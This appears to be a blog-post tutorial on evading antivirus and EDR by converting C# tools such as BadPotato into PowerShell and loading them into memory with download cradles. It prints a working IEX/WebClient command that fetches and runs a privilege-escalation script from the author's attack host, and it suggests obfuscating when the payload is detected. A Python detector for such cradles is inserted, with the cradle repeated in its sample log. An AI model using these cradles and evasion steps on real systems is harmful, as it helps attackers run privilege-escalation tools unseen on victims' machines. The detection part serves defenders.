Thursday, September 14, 2023

AV Evasion via Powershell Cradles & Converting C# binaries into Powershell Scripts


In this post we will go over how to have our payloads downloaded via HTTP and then loaded directly into memory. This is a technique for evading some current AV/EDR vendors.

This will be done in two steps. First, we will use PowerShellArmoury, which includes the script ConvertTo-Powershell.ps1, to convert any of our C# executables into PowerShell scripts (for this example we will just be using a premade script from PowerSharpPack named BadPotato, which has already gone through this process).
Next, using PowerShell download cradles, which simply put are single-line commands that download and execute our code, we will be able to get the script into memory without it ever touching disk! (ALL LINKS ARE BELOW)
-------------------------------------------------------------------------------------------------------------------

Once we have our tools downloaded we can go into the PowerSharpBinaries directory and see all of the C# executables that have already been converted into PowerShell for us.




As mentioned before, we'll be using BadPotato, which is a C# executable for privilege escalation on Windows 8-10 and Windows Server 2012-2019.

With the commands
cat -raw .\Invoke-BadPotato.ps1
&
Invoke-BadPotato
we can see and verify that this script is working as a converted binary.



-------------------------------------------------------------------------------------------------------------------


Now how can we go about getting this PowerShell script loaded from an HTTP-hosted source and injected straight into memory so that no file ever touches disk? The answer is the tool Invoke-CradleCrafter v1.1.

Using the commands


import-module .\Invoke-CradleCrafter.ps1
&
Invoke-CradleCrafter 

the tool loads up and we'll be given the choice to load the PowerShell script into memory or onto disk. By choosing memory we will see a list of the available cradles for downloading our payload.




Choosing MEMORY\NETWEBSTRING\Invoke 2 we are given the result:

IEX ([System.Net.WebClient]::New().DownloadString('http://192.168.1.19:80/Invoke-BadPotato.ps1')) 

--> I edited the URL to match my Kali machine hosting the file. Once this command is run, we can run another IN A NEW POWERSHELL INSTANCE:


Invoke-BadPotato


and we will see that our PowerShell script was indeed downloaded and run in memory successfully again!
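From the defensive side, a cradle like the one above still leaves a recognisable trace: PowerShell script block logging (Event ID 4104) records the decoded script text even when nothing is written to disk. The following is an added example, not code from the original post or from any of the tools it links; it is a small Python checker that flags script blocks pairing a network download with in-memory execution, run over constructed sample log text (the 192.0.2.10 address is a documentation placeholder, not the author's host).

```python
import re

# Added example (not from the post or the tools it links): flag PowerShell
# script blocks that pair a network download with in-memory execution, the
# shape of every cradle Invoke-CradleCrafter emits. Input is ScriptBlockText.
DOWNLOAD_PATTERNS = {
    "Net.WebClient": r"Net\.WebClient",
    "DownloadString/DownloadData": r"\.Download(?:String|Data)\s*\(",
    "Invoke-WebRequest": r"\b(?:Invoke-WebRequest|iwr|curl|wget)\b",
    "Invoke-RestMethod": r"\b(?:Invoke-RestMethod|irm)\b",
}
EXEC_PATTERNS = {
    "Invoke-Expression": r"\b(?:Invoke-Expression|iex)\b",
    "ScriptBlock.Create": r"\[ScriptBlock\]::Create\s*\(",
}
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)

def classify_scriptblock(text: str) -> dict:
    """Report which download and execution indicators a script block contains.
    Only the combination is called a cradle: a plain Invoke-WebRequest that
    saves to -OutFile is normal admin activity and must not be flagged."""
    download = [n for n, p in DOWNLOAD_PATTERNS.items() if re.search(p, text, re.I)]
    execute = [n for n, p in EXEC_PATTERNS.items() if re.search(p, text, re.I)]
    return {
        "download": download,
        "execute": execute,
        "urls": URL_RE.findall(text),
        "cradle": bool(download and execute),
    }

def scan_log(entries):
    """Run the classifier over (record_id, ScriptBlockText) pairs and return
    the ids of the blocks that look like download cradles."""
    return [rid for rid, text in entries if classify_scriptblock(text)["cradle"]]

# Constructed sample 4104 records; 192.0.2.10 is a documentation address.
SAMPLE_LOG = [
    (1, "IEX ([System.Net.WebClient]::New().DownloadString('http://192.0.2.10/Invoke-BadPotato.ps1'))"),
    (2, "Invoke-WebRequest -Uri https://example.com/tool.msi -OutFile C:\\Temp\\tool.msi"),
    (3, "Get-ChildItem C:\\Windows\\Temp | Measure-Object"),
    (4, "$c = New-Object Net.WebClient; $s = $c.DownloadString('http://192.0.2.10/a.ps1'); Invoke-Expression $s"),
]

if __name__ == "__main__":
    for rid, text in SAMPLE_LOG:
        print(rid, classify_scriptblock(text))
    print("cradle records:", scan_log(SAMPLE_LOG))
```

Record 2 shows why both halves are required: a download that lands in a file is routine and would otherwise drown the alert in noise.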


Remember, this can be done with any pre-existing PowerShell script or ANY other C# binary you can think of: Rubeus, Seatbelt, maybe even a DLL sideloader?

Thanks! 🙂


(Just as a note, you may need to obfuscate the C# source code and/or the PowerShell script if the AV/EDR you're testing is detecting this. There are tons of resources out there on how to do this, and it may be featured in a future blog post!)


:LINKS:

PowerSharpPack

BadPotato

PowerShellArmoury

Invoke-CradleCrafter 

https://www.youtube.com/watch?v=BO0bVFZJmpg (Cyber Attack & Defense)

https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
